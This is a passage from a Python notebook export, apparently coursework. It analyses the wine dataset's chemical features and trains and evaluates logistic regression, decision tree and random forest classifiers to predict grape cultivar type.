1.24\n# #Max 4.04 5.80 5.65 \n\n# In[37]:\n\n\n#Lets see individual correlation of MalicAcid with our label Cultivar_Type\nModel_DF[['Cultivar_Type','MalicAcid']].corr()\n\n\n# In[38]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"MalicAcid\",data=Model_DF)\n\n\n# In[39]:\n\n\n#Almost three types are having nearly same spread of datapoints related to Malicacid due to which the feature is not highly significant in differentiating between the CultivarTypes\n\n\n# In[40]:\n\n\n#Considering statistics of Ash we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Ash'].describe()\n\n\n# ## Ash \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 2.455593 2.244789 2.437083\n# #Minimum 2.04 1.36 2.10\n# #Max 3.22 3.23 2.86 \n\n# In[41]:\n\n\n#Lets see individual correlation of Ash with our label Cultivar_Type(It wouldnt be much as there is no significant variation in the values for each type as seen above)\nModel_DF[['Cultivar_Type','Ash']].corr()\n\n\n# In[42]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Ash\",data=Model_DF)\n\n\n# In[43]:\n\n\n#Almost three types are having nearly same spread of datapoints related to Ash due to which the feature is not highly significant in differentiating between the CultivarTypes\n\n\n# In[44]:\n\n\n#Considering 
statistics of Alkalinity we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Alkalinity'].describe()\n\n\n# ## Alkalinity \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 17.037288 20.238028 21.416667(significant variation)\n# #Minimum 11.2 10.6 17.5 (significant variation)\n# #Max 25.0 30.0 27.0 (significant variation) \n\n# In[45]:\n\n\n#Lets see individual correlation of Alkalinity with our label Cultivar_Type(It wouldnt be much as there is no significant variation in the values for each type as seen above)\nModel_DF[['Cultivar_Type','Alkalinity']].corr()\n\n\n# In[46]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Alkalinity\",data=Model_DF)\n\n\n# In[47]:\n\n\n#The three types are having different spread of datapoints(highest value,lowest values) related to alkalinity due to which the feature could be significant in differentiating between the CultivarTypes\n\n\n# In[48]:\n\n\n#Considering statistics of Alkalinity we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Magnesium'].describe()\n\n\n# ## Magnesium \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 106.338983 94.549296 99.312500\n# #Minimum 89.0 70.0 80.0 \n# #Max 132.0 162.0 123.0 \n\n# In[49]:\n\n\n#Lets see individual correlation of Magnesium with our label Cultivar_Type\nModel_DF[['Cultivar_Type','Magnesium']].corr()\n\n\n# In[50]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Magnesium\",data=Model_DF)\n\n\n# In[51]:\n\n\n#Almost three types are having nearly same spread of datapoints related to Magnesium due to which the feature is not highly significant in differentiating between the CultivarTypes\n\n\n# In[52]:\n\n\n#Considering statistics of Phenols we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Phenols'].describe()\n\n\n# ## Phenols \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 2.840169 2.258873 1.678750 (significant variation)\n# #Minimum 2.20 1.10 0.98 (significant variation)\n# #Max 3.88 3.52 2.80 (significant variation) \n\n# In[53]:\n\n\n#Lets see individual correlation of Phenols with our label Cultivar_Type\nModel_DF[['Cultivar_Type','Phenols']].corr()\n\n\n# In[54]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Phenols\",data=Model_DF)\n\n\n# In[55]:\n\n\n#The three types are having different spread of datapoints(highest value,lowest values) related to phenols due to which the feature could be significant in differentiating between the CultivarTypes\n\n\n# In[56]:\n\n\n#Considering statistics of Flavanoids we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Flavanoids'].describe()\n\n\n# ## Flavanoids \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 2.982373 2.080845 0.781458(significant variation)\n# #Minimum 2.19 0.57 0.34 (significant variation) \n# #Max 3.93 5.08 1.57 (significant variation) \n\n# In[57]:\n\n\n#Lets see individual correlation of Flavanoids with our label Cultivar_Type\nModel_DF[['Cultivar_Type','Flavanoids']].corr()\n\n\n# In[58]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Flavanoids\",data=Model_DF)\n\n\n# In[59]:\n\n\n#The three types are having different spread of datapoints(highest value,lowest 
values) related to Flavanoids due to which the feature could be significant in differentiating between the CultivarTypes\n\n\n# In[60]:\n\n\n#Considering statistics of NonFlavanoids we can understand the following details \nModel_DF.groupby('Cultivar_Type')['NonFlavanoids'].describe()\n\n\n# ## NonFlavanoids \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 0.290000 0.363662 0.447500(significant variation)\n# #Minimum 0.17 0.13 0.17 (significant variation)\n# #Max 0.50 0.66 0.63 (significant variation) \n\n# In[61]:\n\n\n#Lets see individual correlation of NonFlavanoids with our label Cultivar_Type\nModel_DF[['Cultivar_Type','NonFlavanoids']].corr()\n\n\n# In[62]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"NonFlavanoids\",data=Model_DF)\n\n\n# In[63]:\n\n\n#Almost three types are having nearly same spread of datapoints related to NonFlavanods due to which the feature is not highly significant in differentiating between the CultivarTypes\n\n\n# In[64]:\n\n\n#Considering statistics of Pcyanins we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Pcyanins'].describe()\n\n\n# ## Pcyanins \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 1.899322 1.630282 1.153542\n# #Minimum 1.25 0.41 0.55 \n# #Max 2.96 3.58 2.70 \n\n# In[65]:\n\n\n#Lets see individual correlation of Pcyanins with our label Cultivar_Type\nModel_DF[['Cultivar_Type','Pcyanins']].corr()\n\n\n# In[66]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Pcyanins\",data=Model_DF)\n\n\n# In[67]:\n\n\n#Almost three types are having nearly same spread of datapoints related to Pcyanins due to which the feature is not highly significant in differentiating between the CultivarTypes\n\n\n# In[68]:\n\n\n#Considering statistics of ColorIntensity we can understand the following details \nModel_DF.groupby('Cultivar_Type')['ColorIntensity'].describe()\n\n\n# ## ColorIntensity \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 5.528305 3.086620 7.396250\n# #Minimum 3.52 1.28 3.85 \n# #Max 8.9 6.0 13.0 \n\n# In[69]:\n\n\n#Lets see individual correlation of ColorIntensity with our label Cultivar_Type\nModel_DF[['Cultivar_Type','ColorIntensity']].corr()\n\n\n# In[70]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"ColorIntensity\",data=Model_DF)\n\n\n# In[71]:\n\n\n#Almost three types are having nearly same spread of datapoints related to ColorIntensity due to which the feature is not highly significant in differentiating between the CultivarTypes\n\n\n# In[72]:\n\n\n#Considering statistics of Hue we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Hue'].describe()\n\n\n# ## Hue \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 1.062034 1.056282 0.682708(significant variation)\n# #Minimum 0.82 0.69 0.48 (significant variation)\n# #Max 1.28 1.71 0.96 (significant variation) \n\n# In[73]:\n\n\n#Lets see individual correlation of Hue with our label Cultivar_Type\nModel_DF[['Cultivar_Type','Hue']].corr()\n\n\n# In[74]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Hue\",data=Model_DF)\n\n\n# In[75]:\n\n\n#The three types are having different spread of datapoints(highest value,lowest values) related to Hue due to which the 
feature could be significant in differentiating between the CultivarTypes\n\n\n# In[76]:\n\n\n#Considering statistics of OD280 we can understand the following details \nModel_DF.groupby('Cultivar_Type')['OD280'].describe()\n\n\n# ## OD280 \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 3.157797 2.785352 1.683542(significant variation)\n# #Minimum 2.51 1.59 1.27 (significant variation)\n# #Max 4.00 3.69 2.47 (significant variation) \n\n# In[77]:\n\n\n#Lets see individual correlation of OD280 with our label Cultivar_Type\nModel_DF[['Cultivar_Type','OD280']].corr()\n\n\n# In[78]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"OD280\",data=Model_DF)\n\n\n# In[79]:\n\n\n#The three types are having different spread of datapoints(highest value,lowest values) related to OD280 due to which the feature could be significant in differentiating between the CultivarTypes\n\n\n# In[80]:\n\n\n#Considering statistics of Proline we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Proline'].describe()\n\n\n# ## Proline \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 1115.711864 519.507042 629.895833(significant variation)\n# #Minimum 680.0 278.0 415.0 (significant variation)\n# #Max 1680.0 985.0 880.0 (significant variation) \n\n# In[81]:\n\n\n#Lets see individual correlation of Proline with our label Cultivar_Type\nModel_DF[['Cultivar_Type','Proline']].corr()\n\n\n# In[82]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Proline\",data=Model_DF)\n\n\n# In[83]:\n\n\n#The three types are having different spread of datapoints(highest value,lowest values) related to Proline due to which the feature could be significant in differentiating between the CultivarTypes\n\n\n# In[ ]:\n\n\n\n\n\n# In[84]:\n\n\n#sns.catplot(x=\"Cultivar_Type\", y=\"Alcohol\", kind=\"box\",data=Model_DF.sort_values(\"Cultivar_Type\"))\n\n\n# In[85]:\n\n\n#sns.catplot(x=\"Cultivar_Type\", y=\"Alcohol\", hue=\"Cultivar_Type\", kind=\"box\", data=Model_DF);\n\n\n# In[86]:\n\n\n#Checking the correlation of each feature with target variable by observing the last column in heat map\n\n\n# In[87]:\n\n\nSelected_features = ['Alcohol','MalicAcid','Ash','Alkalinity','Magnesium','Phenols','Flavanoids','NonFlavanoids','Pcyanins','ColorIntensity','Hue','OD280','Proline','Cultivar_Type']\nX = Model_DF[Selected_features]\n\nplt.subplots(figsize=(10, 10))\nsns.heatmap(X.corr(), annot=True, cmap=\"RdYlGn\")\nplt.show()\n\n\n# ## We can see that six features are highly correlated above positive (0.5) - 1 and above negative (0.5) -5 \n\n# In[88]:\n\n\n#On the basis of individual correlation coefficients, we are determining which independent variables are useful in predicting the target value \n#Correlation coefficient value ranges from -1 to +1; closer to 1, stronger the relationship. 
\n#Also, only correlation coefficients greater than 0.5 in magnitude are considered for further inclusion in the model.\n#These variables are considered relevant attributes for prediction of Cultivar Type.\n\n\n# In[89]:\n\n\n#For clearer values let's see the correlation matrix instead of the heatmap\n\n\n# In[90]:\n\n\nModel_DF.corr()\n\n\n# ## Flavanoids is the first most negatively correlated value: -0.847498 \n# ## OD280 is the second most negatively correlated value: -0.788230 \n# ## Phenols is the third most negatively correlated value: -0.719163 \n# ## Proline is the fourth most negatively correlated value: -0.633717 \n# ## Hue is the fifth most negatively correlated value: -0.617369 \n# ## Alkalinity is the sixth relevant value and the only positively correlated one: 0.517859 \n# \n\n# In[91]:\n\n\n#Checking the distribution again\nModel_DF.groupby(['Cultivar_Type']).size()\n\n\n# In[92]:\n\n\nModel_DF.head()\n\n\n# ## Considering only the highly correlated features Flavanoids, OD280, Phenols, Hue, Proline, Alkalinity for training and testing the model \n\n# In[93]:\n\n\nWine_Corr_features_DF = Model_DF[['Alkalinity','Phenols','Flavanoids','Hue','OD280','Proline']]\n\n\n# In[94]:\n\n\n#Input data to model (features)\nWine_Corr_features_DF.head()\n\n\n# In[95]:\n\n\nWine_Target_DF = Model_DF['Cultivar_Type']\n\n\n# In[96]:\n\n\n#Label data to model (target variable)\nWine_Target_DF.head()\n\n\n# ## Question5.\tIf your chosen algorithm demands training and test datasets, split your wine dataset using an 80/20 split. If dataset is split, evaluate your training and test datasets to ensure they are representative of your full data set. \n\n# ## To Train and Test the Logistic Regression Model, split dataset 80-20%\n\n# In[97]:\n\n\n#Importing the train test split function from sklearn\nfrom sklearn.model_selection import train_test_split\n\n\n# In[98]:\n\n\n#Splitting the data\nX_train, X_test, Y_train, Y_test = train_test_split(Wine_Corr_features_DF,Wine_Target_DF, test_size=0.20, random_state = 1)\n\n\n# In[99]:\n\n\n#Looking at the train data\nX_train\n\n\n# In[100]:\n\n\n#Checking the shape of all splits\nX_train.shape, Y_train.shape, X_test.shape, Y_test.shape\n\n\n# In[101]:\n\n\n# Get a tuple of unique values & their frequency in numpy array for training data\nuniqueValues, occurCount = np.unique(Y_train, return_counts=True)\n \nprint(\"Unique Values : \" , uniqueValues)\nprint(\"Occurrence Count : \", occurCount)\n\n\n# In[102]:\n\n\n#Total records split for training is 142\n#Number of Cultivar1 type in training data is (45) -- (45/142)-- 31.69%\n#Number of Cultivar2 type in training data is (58) -- (58/142)-- 40.84% \n#Number of Cultivar3 type in training data is (39) -- (39/142)-- 27.46%\n################################################################################\n#Number of Cultivar1 type in the full dataset is (59) -- (59/178)-- 33.14%\n#Number of Cultivar2 type in the full dataset is (71) -- (71/178)-- 39.88% \n#Number of Cultivar3 type in the full dataset is (48) -- (48/178)-- 26.96%\n\n\n# In[103]:\n\n\n#displaying training datasets\nprint(X_train,Y_train)\n\n\n# In[104]:\n\n\n# Get a tuple of unique values & their frequency in numpy array for testing data\nuniqueValues, occurCount = np.unique(Y_test, return_counts=True)\n \nprint(\"Unique Values : \" , uniqueValues)\nprint(\"Occurrence Count : \", occurCount)\n\n\n# In[105]:\n\n\n#Total records split for testing is 36\n#Number of Cultivar1 type in testing data is (14) -- (14/36)-- 38.88%\n#Number of Cultivar2 type in testing data is (13) -- (13/36)-- 36.11%
\n#Number of Cultivar3 type in testing data is (9) -- (9/36)-- 25.00%\n################################################################################\n#Number of Cultivar1 type in the full dataset is (59) -- (59/178)-- 33.14%\n#Number of Cultivar2 type in the full dataset is (71) -- (71/178)-- 39.88% \n#Number of Cultivar3 type in the full dataset is (48) -- (48/178)-- 26.96%\n\n\n# ## Total records split for training is 142\n# \n# ### Number of Cultivar1 type in training data is (45) -- (45/142)-- 31.69%\n# ### Number of Cultivar2 type in training data is (58) -- (58/142)-- 40.84%\n# ### Number of Cultivar3 type in training data is (39) -- (39/142)-- 27.46%\n# \n# ## Total records split for testing is 36\n# ### Number of Cultivar1 type in testing data is (14) -- (14/36)-- 38.88%\n# ### Number of Cultivar2 type in testing data is (13) -- (13/36)-- 36.11%\n# ### Number of Cultivar3 type in testing data is (9) -- (9/36)-- 25.00%\n# \n# ## Overall records are 178 \n# ### Number of Cultivar1 type in the overall data is (59) -- (59/178)-- 33.14%\n# ### Number of Cultivar2 type in the overall data is (71) -- (71/178)-- 39.88%\n# ### Number of Cultivar3 type in the overall data is (48) -- (48/178)-- 26.96%\n# \n# # The training dataset split is representative of the overall data as there is only 1 or 2 percentage points of variation compared to the percentages of the overall data \n# # The testing dataset split is also roughly representative of the overall data as there is 4 or 5 percentage points of variation compared to the percentages of the overall data\n\n# In[106]:\n\n\n#Import Logistic regression from SKLearn Libraries\nfrom sklearn.linear_model import LogisticRegression\n\n\n# # Question6. Use the relevant portion of your dataset to train the model of your selected machine learning algorithm. Do all the necessary preprocessing to determine the parameters for your selected algorithm. For example, you will need to specify (and justify) the number of clusters if you choose to use KMeans clustering algorithm via the Elbow curve, Silhouette analysis, etc. \n\n# In[107]:\n\n\n#Creating an instance of Logistic Regression using the multi_class parameter\nlog_reg = LogisticRegression(solver='newton-cg',multi_class='multinomial')\n#Applying training data to the model\nlog_reg.fit(X_train,Y_train)\n\n\n# In[108]:\n\n\n#Generating training predictions\n\n\n# In[109]:\n\n\n#Generate predictions to evaluate the trained model using X_train data. \nYtrain_predict = log_reg.predict(X_train)\n\n\n# In[110]:\n\n\n# Our resulting Y_predict variable is of shape (142,). So, it needs to be converted to a (142,1) 2-D array\n# for a new result dataframe\npredict_ytrain = Ytrain_predict.reshape(-1,1)\nprint(predict_ytrain.shape)\n\n\n# In[111]:\n\n\n# Y_train contains values of our target variable (Cultivar). There were 142 records in the training data. So, Y_train\n# has a shape of (142,) - one-dimensional. We'll need to reshape this into 2-D (142 rows, 1 column of Y-values)\n\ntrain_y = (Y_train.values).reshape(-1,1)\nprint(train_y.shape)\nprint(train_y.size)\n\n\n# In[112]:\n\n\n# We need to obtain probabilities for our predictions. For this, we need to use the predict_proba() function of the \n# logistic regression model we instantiated earlier during model training and predictions.
\n\ntrain_predicted_probs = log_reg.predict_proba(X_train)\nprint(train_predicted_probs)\n\n\n# # As mentioned, the output of the multiclass logistic regression is a set of probabilities based on which the predictions are generated\n\n# In[113]:\n\n\n#Finally, we add all five variables into a Pandas Dataframe for display purposes. \n\nnp.set_printoptions(suppress=True) # this is to prevent small values being displayed in scientific notation\n\ntrain_prob_results_df = pd.DataFrame(train_predicted_probs)\ntrain_prob_results_df[\"Predicted\"] = predict_ytrain\ntrain_prob_results_df[\"Actual\"] = train_y\ntrain_prob_results_df.head(10)\n\n\n# # 7. Using appropriate metrics for your chosen algorithm, evaluate the trained model. Explain and justify the worthiness of your trained model. \n\n# In[114]:\n\n\n# Let's evaluate the trained model based on the predictions generated above\n\nfrom sklearn.metrics import classification_report\nfrom sklearn import metrics\n\nprint(classification_report(train_y,predict_ytrain))\n\n\n# In[115]:\n\n\nconf_matrix = metrics.confusion_matrix(train_y,predict_ytrain)\nconf_matrix\n\n\n# In[116]:\n\n\nprint(\"Accuracy:\",metrics.accuracy_score(train_y,predict_ytrain))\n\n\n# In[117]:\n\n\nprint(\"Precision:\",metrics.precision_score(train_y,predict_ytrain, average = \"macro\"))\nprint(\"Recall:\",metrics.recall_score(train_y,predict_ytrain,average = \"macro\"))\n\n\n# In[118]:\n\n\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import LabelBinarizer\ndef multiclass_roc_auc_score(y_test, y_pred, average=\"macro\"):\n    lb = LabelBinarizer()\n    lb.fit(y_test)\n    y_test = lb.transform(y_test)\n    y_pred = lb.transform(y_pred)\n    return roc_auc_score(y_test, y_pred, average=average)\nauc = multiclass_roc_auc_score(train_y,predict_ytrain, average=\"macro\")\nprint(\"Area under curve : \", auc)\n\n\n# # The model is trained well as the AUC is almost 1.00 (0.97) and all the other metrics of Accuracy, Recall, Precision, and F1-score are above 95% and close to 1.0, the highest value for all metrics. \n# # This means that the trained model could identify Cultivar0 as Cultivar0, Cultivar1 as Cultivar1 and Cultivar2 as Cultivar2. The model is trained to be able to distinguish between (and therefore, predict correctly) the Cultivar_Types.\n\n# # 8.\tNext, use the relevant portion of your dataset (as dictated by the chosen algorithm) to evaluate the performance of your model. Again, use all relevant metrics for your algorithm to discuss the outcome in terms of model’s accuracy and usefulness in generating predictions. These may include such metrics as SSE, MSSE, Silhouette scores, completeness scores, confusion matrix, AOC curve, etc. as dictated by and available for your chosen machine language algorithm.\n\n# In[119]:\n\n\n#Generate predictions to evaluate the model on the test set using X_test data and predicting Y\n\nYtest_predict = log_reg.predict(X_test)\n\n\n# In[120]:\n\n\n# Our resulting Y_predict variable is of shape (36,). So, it needs to be converted to a (36,1) 2-D array\n# for a new result dataframe\npredict_ytest = Ytest_predict.reshape(-1,1)\nprint(predict_ytest.shape)\n\n\n# In[121]:\n\n\n# Y_test contains values of our target variable (Cultivar). There were 36 records in the test data. So, Y_test\n# has a shape of (36,) - one-dimensional. We'll need to reshape this into 2-D (36 rows, 1 column of Y-values)\n\ntest_y = (Y_test.values).reshape(-1,1)\nprint(test_y.shape)\nprint(test_y.size)\n\n\n# In[122]:\n\n\n# We need to obtain probabilities for our predictions. 
For this, we need to use the predict_proba() function of the \n# logistic regression model we instantiated earlier during model training and predictions. \n\ntest_predicted_probs = log_reg.predict_proba(X_test)\nprint(test_predicted_probs)\n\n\n# In[123]:\n\n\n#Finally, we add all three variables into a Pandas Dataframe for display purposes. \n\nnp.set_printoptions(suppress=True) \nimport pandas as pd\npd.set_option('display.precision',11)\n\n# this is to prevent small values being displayed in scientific notation\ntest_prob_results_df = pd.DataFrame(test_predicted_probs)\ntest_prob_results_df[\"Predicted\"] = predict_ytest\ntest_prob_results_df[\"Actual\"] = test_y\ntest_prob_results_df.head(40)\n\n\n# Note: columns (0, 1 and 2) represent the probability of an observation being classified as 0, 1 and 2 (Cultivar1, Cultivar2, Cultivar3\n# respectively), as it is a multinomial classification. \n#So, for the first record, the value predicted by the model for Cultivar Type is \"2\" and the actual Cultivar_Type value for that observation in the test dataset is also \"2\"\n#The probability that this observation is correctly classified as 2 is 0.85333574416, while the probabilities that it is \n# misclassified as 0 or as 1 are 0.00124438217 and 0.14541987367 respectively\n\n#Judging from these probabilities for all the 36 records, the model is predicting with a high level of accuracy.\n#How high that level is, though, is hard to say from the probabilities alone; it can be interpreted correctly by evaluating various metrics. \n\n\n# In[124]:\n\n\n#With more data we could have trained the model even better\n\n\n# In[125]:\n\n\n# Let's evaluate the model based on the predictions generated above\n\nfrom sklearn.metrics import classification_report\nfrom sklearn import metrics\n\nprint(classification_report(Y_test,Ytest_predict))\n\n\n# In[126]:\n\n\nconf_matrix = metrics.confusion_matrix(Y_test, Ytest_predict)\nconf_matrix\n\n\n# # Understanding the confusion matrix output of multiclass classification\n# \n#                  #Predicted values\n#                      0    1   2\n#                 0 ([[13,  1,  0],\n# #Actual values  1   [ 1, 12,  0],\n#                 2   [ 0,  0,  9]])\n# \n# Based on the Confusion Matrix, we can see that the predictive performance of the trained model is very\n# good. Of the total 36 cases, 94.4% are predicted correctly (36.11% Cultivar0, 33.33% Cultivar1 and 25% Cultivar2) while only\n# 5.6% are incorrectly predicted. This is further supported by the fact that Recall, Accuracy, Precision, and\n# F1-score are >= 0.94, very close to 1.0, the ideal score. \n\n# In[127]:\n\n\nprint(\"Accuracy:\",metrics.accuracy_score(Y_test, Ytest_predict))\n\n\n# In[128]:\n\n\nprint(\"Precision:\",metrics.precision_score(Y_test,Ytest_predict, average = \"macro\"))\nprint(\"Recall:\",metrics.recall_score(Y_test,Ytest_predict,average = \"macro\"))\n\n\n# In[129]:\n\n\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import LabelBinarizer\ndef multiclass_roc_auc_score(y_test, y_pred, average=\"macro\"):\n    lb = LabelBinarizer()\n    lb.fit(y_test)\n    y_test = lb.transform(y_test)\n    y_pred = lb.transform(y_pred)\n    return roc_auc_score(y_test, y_pred, average=average)\nauc = multiclass_roc_auc_score(Y_test, Ytest_predict, average=\"macro\")\nprint(\"Area under curve : \", auc)\n\n\n# # The AUC is also close to 1.0. 
Hence, the trained Logistic Regression model is useful in accurately predicting the Cultivar type based on the chemical characteristics of wine\n\n# \n# ## ######################################################################\n# Accuracy of the model is: 94.4 percent (the model predicts about 94% of cases correctly)\n# ######################################################################\n# Recall score of the complete model is 95%\n# Recall score of predicting Cultivar = 0 is 93%\n# Recall score of predicting Cultivar = 1 is 92%\n# Recall score of predicting Cultivar = 2 is 100%\n# #####################################################################\n# Precision score of the complete model is 95%\n# Precision score of predicting Cultivar = 0 is 93%\n# Precision score of predicting Cultivar = 1 is 92%\n# Precision score of predicting Cultivar = 2 is 100%\n# #####################################################################\n# F1 score of the complete model is 95%\n# F1 score of predicting Cultivar = 0 is 93%\n# F1 score of predicting Cultivar = 1 is 92%\n# F1 score of predicting Cultivar = 2 is 100%\n# #####################################################################\n\n# ## #####\n# # Area Under the Curve is calculated = 0.96\n# # The higher the AUC, the better the model is at predicting 0s as 0s, 1s as 1s and 2s as 2s. By analogy, the higher the AUC, the better the model is at distinguishing between the three Cultivar Types\n# #As our classification AUC score is 0.96, the model can distinguish between 0s, 1s and 2s and predict them with around 94% accuracy\n# #This indicates our model is worthy and also a good model in predicting the Cultivar categories\n\n# ## #####################################################################\n# #Recall:\n# It talks about the quality of the machine learning model when it comes\n# to predicting a positive class. So out of the total positive cases, how many\n# was the model able to predict correctly? 
This metric is widely used as an\n# evaluation criterion for classification models.\n# The recall values of our model are\n# ######################################################################\n# Recall score of the complete model is 95%\n# Recall score of predicting Cultivar = 0 is 93%\n# Recall score of predicting Cultivar = 1 is 92%\n# Recall score of predicting Cultivar = 2 is 100%\n# #which is good\n# #####################################################################\n# #Precision:\n# Precision is about the number of actual positive cases out of all the positive\n# cases predicted by the model\n# The precision values of our model are\n# #####################################################################\n# Precision score of the complete model is 95%\n# Precision score of predicting Cultivar = 0 is 93%\n# Precision score of predicting Cultivar = 1 is 92%\n# Precision score of predicting Cultivar = 2 is 100%\n# #which are good\n# ################################################################\n# #F1 Score:\n# It considers both the precision p and the recall r of the test to compute the score\n# The F1-score values of our model are\n# #####################################################################\n# F1 score of the complete model is 95%\n# F1 score of predicting Cultivar = 0 is 93%\n# F1 score of predicting Cultivar = 1 is 92%\n# F1 score of predicting Cultivar = 2 is 100%\n# #which are good\n# #####################################################################\n# # Area Under the Curve is calculated = 0.9604525908873734\n# # The higher the AUC, the better the model is at predicting 0s as 0s, 1s as 1s and 2s as 2s. By analogy, the higher the AUC, the better the model is at distinguishing between the Cultivar types\n# #As our classification AUC score is 0.96, the model can distinguish between 0s, 1s and 2s and predict them with around 94% accuracy\n# #This indicates our model is worthy and also a good model in predicting the Cultivar types\n# ########################################################################\n# Accuracy of the model is: 94.4 percent (the model predicts about 94% of cases correctly)\n\n# # In case of non-linear data and heavy overlap between the target classes we can use the following algorithms (Decision Tree and Random Forest) for classification, when complexity and time are not an issue (Optional)\n\n# In[130]:\n\n\n# Checking Decision Tree Classifier\n\n\n# In[131]:\n\n\nimport pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier # Import Decision Tree Classifier\nfrom sklearn.model_selection import train_test_split # Import train_test_split function\nfrom sklearn import metrics\n\n\n# In[132]:\n\n\n#Creating an instance of the Decision Tree classifier\nDTC = DecisionTreeClassifier()\n\n# Applying the Decision Tree Classifier on the training data\nDTC = DTC.fit(X_train,Y_train)\n\nDTC_prob = DTC.predict_proba(X_test)\n#Predict the response for the test dataset\nDTC_y_pred = DTC.predict(X_test)\n\n\n# In[133]:\n\n\n#Looking at the predictions\nDTC_y_pred\n\n\n# In[134]:\n\n\n#Creating a pandas dataframe for the Decision Tree result\nDTC_results_df = pd.DataFrame(DTC_prob)\nDTC_results_df[\"Predicted\"] = DTC_y_pred\nDTC_results_df[\"Actual\"] = test_y\nDTC_results_df.head(20)\n\n\n# In[135]:\n\n\nprint(\"Accuracy:\",metrics.accuracy_score(Y_test, DTC_y_pred))\n#Clearly has lower accuracy compared to the logistic regression model\n\n\n# In[136]:\n\n\n# Let's evaluate the model based on the predictions generated above\n\nfrom sklearn.metrics import classification_report\nfrom 
sklearn import metrics\n\nprint(classification_report(Y_test,DTC_y_pred))\n\n\n# In[137]:\n\n\n#The precision, F1-score and recall are also lower compared to the logistic regression model\n\n\n# In[138]:\n\n\nauc = multiclass_roc_auc_score(Y_test,DTC_y_pred, average=\"macro\")\nprint(\"Area under curve : \", auc)\n#The AUC is lower when compared to Logistic Regression, but 0.9 is not a bad value\n\n\n# In[139]:\n\n\n# Random Forest is an ensemble technique which uses decision trees as the base learners; the many branch (if-else) evaluations make it time consuming\n\n\n# In[140]:\n\n\n# Checking Random Forest Classifier\n\n\n# In[141]:\n\n\nfrom sklearn.ensemble import RandomForestClassifier\n\n# Create the model with 100 trees\nRFC = RandomForestClassifier(n_estimators=100, \n                               bootstrap = True,\n                               max_features = 'sqrt')\n# Fit on training data\nRFC.fit(X_train,Y_train)\n\n\n# In[142]:\n\n\n# Actual class predictions\nRF_predictions = RFC.predict(X_test)\n# Probabilities for each class\nRF_probs = RFC.predict_proba(X_test)\n\n\n# In[143]:\n\n\n#Creating a pandas dataframe for the Random Forest result\nRFC_results_df = pd.DataFrame(RF_probs)\nRFC_results_df[\"Predicted\"] = RF_predictions \nRFC_results_df[\"Actual\"] = test_y\nRFC_results_df.head(20)\n\n\n# In[144]:\n\n\nprint(\"Accuracy:\",metrics.accuracy_score(Y_test,RF_predictions))\n#Random forest also has an accuracy value similar to the logistic regression model\n\n\n# In[145]:\n\n\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\n\nprint(confusion_matrix(Y_test,RF_predictions))\nprint(classification_report(Y_test,RF_predictions))\nprint(accuracy_score(Y_test,RF_predictions))\n\n\n# In[146]:\n\n\nauc = multiclass_roc_auc_score(Y_test,RF_predictions, average=\"macro\")\nprint(\"Area under curve : \", auc)\n\n\n# In[147]:\n\n\n# All the values like accuracy, F1-score, recall, precision are the same as the logistic regression outputs, which makes random forest also a good model to classify the Cultivar_Types\n\n","repo_name":"VenkataSowjanyaKoka/Grape-Category-Prediction","sub_path":"VenkataSowjanyaKoka-GrapeCategory-Prediction.py","file_name":"VenkataSowjanyaKoka-GrapeCategory-Prediction.py","file_ext":"py","file_size_in_byte":55512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
